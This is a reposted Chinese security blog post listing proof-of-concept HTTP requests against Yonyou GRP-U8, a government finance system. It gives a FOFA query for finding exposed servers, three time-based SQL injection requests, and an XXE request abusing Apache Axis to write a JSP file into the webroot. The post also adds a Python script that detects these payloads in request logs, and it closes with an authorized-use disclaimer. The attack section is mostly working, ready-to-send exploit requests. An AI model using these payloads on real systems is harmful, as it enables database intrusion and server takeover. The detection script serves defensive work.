A batch of Yonyou (用友) POC/EXP

admin, 2024-04-29 11:30:38, 16 views

Yonyou GRP-U8 slbmbygr.jsp SQL injection vulnerability

fofa

app="用友-GRP-U8"

poc

GET /u8qx/slbmbygr.jsp?gsdm=1';waitfor+delay+'0:0:3'--&zydm=&kjnd= HTTP/1.1
Host: xxxxxx
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Yonyou GRP-U8 sqcxIndex.jsp SQL injection vulnerability

poc

GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:3'-- HTTP/1.1
Host:
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=06D017067FC6F3BFA6150315042277B6
x-forwarded-for: 127.0.0.1
Connection: clo

Yonyou GRP-U8 ufgovbank XXE vulnerability

poc

POST /ufgovbank HTTP/1.1
Host: 172.16.135.21:8009
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 1158

reqData=%3C%3Fxml%20version%3D%221.0%22%3F%3E%0A%3C%21DOCTYPE%20foo%20SYSTEM%20%22http%3A%2F%2F127.0.0.1%3A8009%2Fservices%2FAdminService%3Fmethod%3D%21--%253E%253Cdeployment%2520xmlns%253D%2522http%253A%252F%252Fxml.apache.org%252Faxis%252Fwsdd%252F%2522%2520xmlns%253Ajava%253D%2522http%253A%252F%252Fxml.apache.org%252Faxis%252Fwsdd%252Fproviders%252Fjava%2522%253E%253Cservice%2520name%253D%2522OpenTaske%2522%2520provider%253D%2522java%253ARPC%2522%253E%253CrequestFlow%253E%253Chandler%2520type%253D%2522java%253Aorg.apache.axis.handlers.LogHandler%2522%2520%253E%253Cparameter%2520name%253D%2522LogHandler.fileName%2522%2520value%253D%2522C:UFGOVU8webappsbx_cxjk_list.jsp%2522%2520%252F%253E%253Cparameter%2520name%253D%2522LogHandler.writeToConsole%2522%2520value%253D%2522false%2522%2520%252F%253E%253C%252Fhandler%253E%253C%252FrequestFlow%253E%253Cparameter%2520name%253D%2522className%2522%2520value%253D%2522java.util.Random%2522%2520%252F%253E%253Cparameter%2520name%253D%2522allowedMethods%2522%2520value%253D%2522*%2522%2520%252F%253E%253C%252Fservice%253E%253C%252Fdeployment%22%3E&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

Yonyou GRP-U8 userInfoWeb SQL injection

poc

POST /services/userInfoWeb HTTP/1.1
Cache-Control: max-age=0
Origin: null
DNT: 1
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Host: 172.16.135.132:8009
Content-Length: 558

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
<soapenv:Header/>
<soapenv:Body>
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:3'--</userId>
</ser:getUserNameById>
</soapenv:Body>
</soapenv:Envelope>
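All four PoCs above share two observable markers: the three SQL injections are time-based blind injections carrying a `waitfor delay` clause, and the XXE request posts an XML document whose DOCTYPE declares an external SYSTEM identifier inside a percent-encoded `reqData` field. The following Python script is an added detection example, not code from the original post or from Yonyou: it decodes request lines and bodies (repeatedly, so double-encoded payloads such as `%253C` surface), and flags those markers on the GRP-U8 endpoints named in the PoCs. The endpoint list assumes the default context paths shown above, and the sample records are constructed, not real traffic.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus, urlsplit

# Endpoints named in the write-up. Assumption: the application is deployed under
# the same context paths as in the PoCs; adjust this table if yours differ.
GRP_U8_ENDPOINTS = {
    "/u8qx/slbmbygr.jsp": "SQLi via gsdm",
    "/u8qx/sqcxIndex.jsp": "SQLi via key",
    "/services/userInfoWeb": "SQLi via SOAP userId",
    "/ufgovbank": "XXE via reqData",
}

# All three SQLi PoCs are time-based blind injections using MSSQL WAITFOR DELAY.
SQLI_RE = re.compile(r"\bwaitfor\s+delay\s+'?\d+:\d+:\d+", re.IGNORECASE)
# The XXE PoC posts a document whose DOCTYPE carries an external (SYSTEM) identifier.
XXE_RE = re.compile(r"<!DOCTYPE\b[^>]*\bSYSTEM\b", re.IGNORECASE)


def fully_decode(text: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads (%253C -> %3C -> <) become visible."""
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify(method: str, target: str, body: str = "") -> Optional[str]:
    """Return a verdict for a suspicious request to a GRP-U8 endpoint, or None if clean."""
    path = urlsplit(target).path
    if path not in GRP_U8_ENDPOINTS:
        return None
    haystack = fully_decode(target) + "\n" + fully_decode(body)
    if SQLI_RE.search(haystack):
        return f"time-based SQLi attempt: {method} {path} ({GRP_U8_ENDPOINTS[path]})"
    if XXE_RE.search(haystack):
        return f"XXE attempt: {method} {path} ({GRP_U8_ENDPOINTS[path]})"
    return None


def scan(records: List[Tuple[str, str, str]]) -> List[Tuple[int, str]]:
    """Apply classify() to each (method, target, body) record; return hits as (index, verdict)."""
    hits = []
    for i, (method, target, body) in enumerate(records):
        verdict = classify(method, target, body)
        if verdict:
            hits.append((i, verdict))
    return hits


# Constructed sample records (not real traffic). Request bodies are only available from a
# proxy or WAF log that captures them; a plain access log gives you the request line only.
SAMPLE_RECORDS = [
    ("GET", "/u8qx/slbmbygr.jsp?gsdm=1';waitfor+delay+'0:0:3'--&zydm=&kjnd=", ""),
    ("GET", "/u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:3'--", ""),
    ("POST", "/services/userInfoWeb",
     "<userId>';waitfor delay '0:0:3'--</userId>"),
    ("POST", "/ufgovbank",
     "reqData=%3C%3Fxml%20version%3D%221.0%22%3F%3E%3C%21DOCTYPE%20foo%20SYSTEM%20"
     "%22http%3A%2F%2Fexample.invalid%2Fx%22%3E&signData=1"),
    ("GET", "/u8qx/slbmbygr.jsp?gsdm=001&zydm=&kjnd=2024", ""),   # benign use of the page
    ("GET", "/other/app.jsp?q=1';waitfor+delay+'0:0:3'--", ""),     # not a GRP-U8 path
]

if __name__ == "__main__":
    for idx, verdict in scan(SAMPLE_RECORDS):
        print(idx, verdict)
```

The path check comes first so that the SQL and XXE patterns only fire on the affected endpoints, which keeps the rule quiet on unrelated traffic; if you would rather alert on any `waitfor delay` regardless of path, drop the endpoint lookup and keep the decoding step, since the percent-encoding is what hides these payloads from naive substring matches.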

The technical articles on this public account are provided only for reference by network security engineers inspecting or maintaining the websites, servers and networks under their own administration, and the account's testing tools are only for use by security testers at security companies in security testing. Without permission, do not use the technical material in these articles to attack any external computer system, and none of the account's tools may be used for any unauthorized form of security testing. The account only provides a venue for technical exchange and accepts no responsibility for any theoretical or actual loss caused by any member's use of its articles or testing tools.

Originally published on the WeChat public account TKing的安全圈: 用友一波POC/EXP

Source (CN-SEC 中文网; keep this link when reposting): 用友一波POC/EXP https://cn-sec.com/archives/2697614.html
